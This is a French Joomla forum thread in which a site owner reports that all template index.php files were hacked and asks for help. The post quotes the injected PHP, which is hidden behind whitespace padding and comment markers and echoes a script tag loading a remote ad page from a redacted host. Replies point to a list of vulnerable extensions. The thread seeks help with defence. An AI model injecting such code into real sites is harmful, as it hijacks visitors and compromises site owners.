Piratage des templates : Comment es-ce possible ? Que faire ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Piratage des templates : Comment es-ce possible ? Que faire ?

    Bonjour,

    Utilisateur depuis un long moment de Joomla et désormais de Joomla 2.5, c'est la première fois que cela m'arrive, on vient de pirater tous mes templates dans le dossier "Templates" de Joomla.
    Comment ? Je ne sais absolument pas.

    On a rajouter sur toutes les pages "index.php" des templates, le script suivant :

    Code:
    <?
    #78c124#                                                                                                                                             echo"                                                                                                                                                   <script type=\"text/javascript\" src=\"http://xxxxx.info/1/ad.php?id=3\" name=\"umtx1\"></script>";
    #/78c124#
    ?>
    Bien sur ce lien s'ouvre dès l'ouverture du site joomla et bien sur c'est un site à caractère *****.
    Comment dois-je faire pour remédier à ce problème et ne plus que ça se reproduise ?
    J'ai déjà supprimé ce script. Je ne comprends pas parce que les templates sont ajoutés comme n'importe quel template, c'est à dire depuis l'espace admin de Joomla 2.5

    Un grand merci pour votre aide

  • #2
    Re : Piratage des templates : Comment es-ce possible ? Que faire ?

    Bonjour,

    C'est une technique classique d'intrusion et de piratage. Vérifier que toutes les extensions sont à jour et NON vulnérables http://docs.joomla.org/Vulnerable_Extensions_List

    Et surtout rechercher la faille par laquelle l'intrus a pu s'introduire.
    Pas de demande de support par MP.
    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

    Commentaire


    • #3
      Re : Piratage des templates : Comment es-ce possible ? Que faire ?

      +1 jisse03

      Commentaire

      Annonce

      Réduire
      Aucune annonce pour le moment.

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X